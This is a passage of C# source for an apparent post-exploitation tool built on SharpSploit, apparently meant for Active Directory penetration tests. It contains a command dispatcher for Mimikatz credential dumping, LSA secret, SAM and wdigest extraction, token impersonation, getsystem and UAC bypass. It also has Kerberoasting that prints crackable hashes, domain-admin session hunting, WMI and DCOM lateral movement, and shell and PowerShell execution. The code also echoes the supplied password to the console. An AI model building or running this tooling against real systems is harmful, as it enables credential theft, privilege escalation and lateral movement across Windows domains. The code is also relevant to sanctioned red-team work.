private static void getDomainComputers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable <string> target = null)
{
List <SharpSploit.Enumeration.Domain.DomainObject> a = searcher.GetDomainComputers(target);
foreach (SharpSploit.Enumeration.Domain.DomainObject val in a)
{
Console.WriteLine(val.ToString());
}
}
private static void kerberoast(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable <string> target = null)
{
List <SharpSploit.Enumeration.Domain.SPNTicket> a = searcher.Kerberoast(target);
foreach (SharpSploit.Enumeration.Domain.SPNTicket val in a)
{
Console.WriteLine(val.GetFormattedHash());
}
}
private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args)
{
try
{
SharpSploit.Enumeration.Domain.Credential creds = null;
string domain = "", server = "", searchBase = "", searchString = "";
System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree;
int resultPageSize = 200;
TimeSpan serverTimeLimit = default(TimeSpan);
bool tombStone = false;
System.DirectoryServices.SecurityMasks securityMasks = 0;
string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-username") > -1)
{
if (Array.IndexOf(argsLower, "-password") > -1)
{
creds = new SharpSploit.Enumeration.Domain.Credential(args[Array.IndexOf(args, "-username") + 1], args[Array.IndexOf(args, "-password") + 1]);
Console.WriteLine(args[Array.IndexOf(args, "-password") + 1]);
}
else
{
Console.WriteLine("Error, if providing credentials you must provide both a username and password");
return(null);
}
}
if (Array.IndexOf(argsLower, "-domain") > -1)
{
domain = args[Array.IndexOf(args, "-domain") + 1];
}
if (Array.IndexOf(argsLower, "-server") > -1)
{
server = args[Array.IndexOf(args, "-server") + 1];
}
if (Array.IndexOf(argsLower, "-searchbase") > -1)
{
searchBase = args[Array.IndexOf(args, "-searchbase") + 1];
}
if (Array.IndexOf(argsLower, "-searchstring") > -1)
{
searchString = args[Array.IndexOf(args, "-searchstring") + 1];
}
var gather = new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks);
return(gather);
}
catch
{
Console.WriteLine("Error Generating Domain Searcher Object");
return(null);
}
}
static void GetDomainAdministrators()
{
//checks the domain for users with domain administrator rights or higher
//checks wether those users have sessions on any host of the domain
Console.WriteLine("[*] Enumerating Administrators");
Domain.DomainSearcher searcher = new Domain.DomainSearcher();
IList <Domain.DomainObject> users = searcher.GetDomainUsers(null);
sw.WriteLine("Domain Administrators:");
//List of logged in Users of a System
foreach (Domain.DomainObject user in users)
{
if ((user.admincount == "1" && !(user.name.Contains("$")) && !(user.name.Contains("krbtgt"))))
{
Console.WriteLine("[+] Found Domain Administrator: " + user.name.ToString());
sw.WriteLine("\\item " + user.name.ToString());
SharpSploit.Enumeration.Domain.DomainSearcher usersearcher = new SharpSploit.Enumeration.Domain.DomainSearcher();
List <SharpSploit.Enumeration.Domain.DomainObject> c = usersearcher.GetDomainComputers();
foreach (SharpSploit.Enumeration.Domain.DomainObject val in c)
{
List <Net.LoggedOnUser> AdministratorSessions = Net.GetNetLoggedOnUsers(new List <string> {
val.name
});
foreach (var b in AdministratorSessions)
{
if ((!(b.UserName.Contains("$")) && b.UserName == user.name))
{
Console.WriteLine("[+] Found session on " + b.ComputerName + " for: " + b.UserName);
sw.WriteLine("[+] Found session on " + b.ComputerName + " for: " + b.UserName);
}
}
}
}
}
}
}//End Main
//SharpSploit Command Modules
private static void commands(string[] request)
{
String error = ER();
try
{
//exit
if (request[0].ToLower() == "exit")
{
return;
}
//help
else if (request[0].ToLower() == "help" || request[0] == "?")
{
help();
}
//SharpSploit Credential Modules
else if (request[0].ToLower() == "mimi-all")
{
mimiAll();
}
else if (request[0].ToLower() == "mimi-command")
{
mimiCommand(request);
}
else if (request[0].ToLower() == "logonpasswords")
{
logonPasswords();
}
else if (request[0].ToLower() == "lsacache")
{
lsaCache();
}
else if (request[0].ToLower() == "lsasecrets")
{
lsaSecrets();
}
else if (request[0].ToLower() == "samdump")
{
samDump();
}
else if (request[0].ToLower() == "wdigest")
{
wDigest();
}
//Token Class Begin
else if (request[0].ToLower() == "whoami")
{
WhoAmI();
}
else if (request[0].ToLower() == "getsystem")
{
getSystem();
}
else if (request[0].ToLower() == "impersonate")
{
impersonateProcess(request);
}
else if (request[0].ToLower() == "bypassuac")
{
bypassUAC(request);
}
else if (request[0].ToLower() == "reverttoself")
{
revertToSelf();
}
//SharpSploit Enumeration Modules
else if (request[0].ToLower() == "kerberoast")
{
SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request);
string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-target") > -1)
{
IEnumerable <string> target = new String[] { request[Array.IndexOf(request, "-target") + 1] };
kerberoast(searcher, target);
}
else
{
kerberoast(searcher);
}
}
else if (request[0].ToLower() == "getdomainusers")
{
SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request);
string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-target") > -1)
{
IEnumerable <string> target = new String[] { request[Array.IndexOf(request, "-target") + 1] };
getDomainUsers(searcher, target);
}
else
{
getDomainUsers(searcher);
}
}
else if (request[0].ToLower() == "getdomaingroups")
{
SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request);
string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-target") > -1)
{
IEnumerable <string> target = new String[] { request[Array.IndexOf(request, "-target") + 1] };
getDomainGroups(searcher, target);
}
else
{
getDomainGroups(searcher);
}
}
else if (request[0].ToLower() == "getdomaincomputers")
{
SharpSploit.Enumeration.Domain.DomainSearcher searcher = searcherBuilder(request);
string[] argsLower = request.Select(s => s.ToLowerInvariant()).ToArray();
if (Array.IndexOf(argsLower, "-target") > -1)
{
IEnumerable <string> target = new String[] { request[Array.IndexOf(request, "-target") + 1] };
getDomainComputers(searcher, target);
}
else
{
getDomainComputers(searcher);
}
}
else if (request[0].ToLower() == "currentdirectory")
{
currentDirectory();
}
else if (request[0].ToLower() == "directorylisting")
{
directoryListing();
}
else if (request[0].ToLower() == "changedirectory")
{
changeDirectory(request);
}
else if (request[0].ToLower() == "hostname")
{
hostname();
}
else if (request[0].ToLower() == "processlist")
{
processList();
}
else if (request[0].ToLower() == "procdump")
{
procDump(request);
}
else if (request[0].ToLower() == "username")
{
username();
}
else if (request[0].ToLower() == "readregistry")
{
readReg(request);
}
else if (request[0].ToLower() == "writeregistry")
{
writeReg(request);
}
else if (request[0].ToLower() == "netlocalgroupmembers")
{
netLocalGroupMembers(request);
}
else if (request[0].ToLower() == "netlocalgroups")
{
netLocalGroups(request);
}
else if (request[0].ToLower() == "netloggedonusers")
{
netLoggedOnUsers(request);
}
else if (request[0].ToLower() == "netsessions")
{
netSessions(request);
}
else if (request[0].ToLower() == "ping")
{
ping(request);
}
else if (request[0].ToLower() == "portscan")
{
portScan(request);
}
//SharpSploit Lateral Movement Modules
else if (request[0].ToLower() == "wmi")
{
wmi(request);
}
else if (request[0].ToLower() == "dcom")
{
dcom(request);
}
//SharpSploit Execution Modules
else if (request[0].ToLower() == "shell")
{
shell(request);
}
else if (request[0].ToLower() == "powershell")
{
powerShell(request);
}
//Unknown command
else
{
Console.WriteLine("unknown command, type help for commandline options");
}
}//End Try
catch
{
Console.WriteLine(error);
}
}
static void GetDomainControllers()
{
//gets the Domain Controllers of the Domain and prints the logged in Users
Console.WriteLine("[*] Enumerating Domain Controllers and logged on User Sessions");
Console.WriteLine("[*] Multiple Sessions of a single User on a Domain Controller possible");
//used as a concatinated string of the hostnames of all DCs found to pass into the nmap command
string dc_hostnames = "";
//Create Domain Searcher
SharpSploit.Enumeration.Domain.DomainSearcher searcher = new SharpSploit.Enumeration.Domain.DomainSearcher();
//Create list of Domain Computers
List <SharpSploit.Enumeration.Domain.DomainObject> a = searcher.GetDomainComputers();
//Create List of String Objects containing the found Domain Controllers
List <Net.LoggedOnUser> users;
//Iterate through all Domain Objects (Domain Computers)
List <String> DomainControllers = new List <string>();
sw.WriteLine("Domain Controllers:");
foreach (SharpSploit.Enumeration.Domain.DomainObject val in a)
{
if (val.cn.Contains("DC"))
{
//store in List of Domain Controllers
DomainControllers.Add(val.name.ToString());
//output the found Domain Controllers and write also to output file
Console.WriteLine("[+] Found Domain Controller: " + val.name.ToString());
if (dc_hostnames == "")
{
dc_hostnames = val.name.ToString();
}
else
{
dc_hostnames = dc_hostnames + ", " + val.name.ToString();
}
sw.WriteLine("\\item " + "\\textbf{" + val.name.ToString() + "}");
users = Net.GetNetLoggedOnUsers(new List <string> {
val.name
});
sw.WriteLine("List of logged in Users on " + val.name + ":");
//iterate over list of logged on users for the domain object
foreach (var s in users)
{
//filter out "Windows Computer Accounts"
if (!(s.UserName.Contains("$")))
{
Console.WriteLine("[+] Found user session on " + val.name + ": " + s.UserName);
sw.WriteLine("\\item" + "" + s.UserName);
}
}
}
}
//create Todo for manual enumration of SMB-Signing with nmap
Console.WriteLine("[+] To Do: manual Enumeration of SMB-Signing of the Domain Controllers");
sw.WriteLine("To Do: Check if SMB-Signing enabled on the host:");
sw.WriteLine("nmap -p137,139,445 --script smb-security-mode " + dc_hostnames);
}
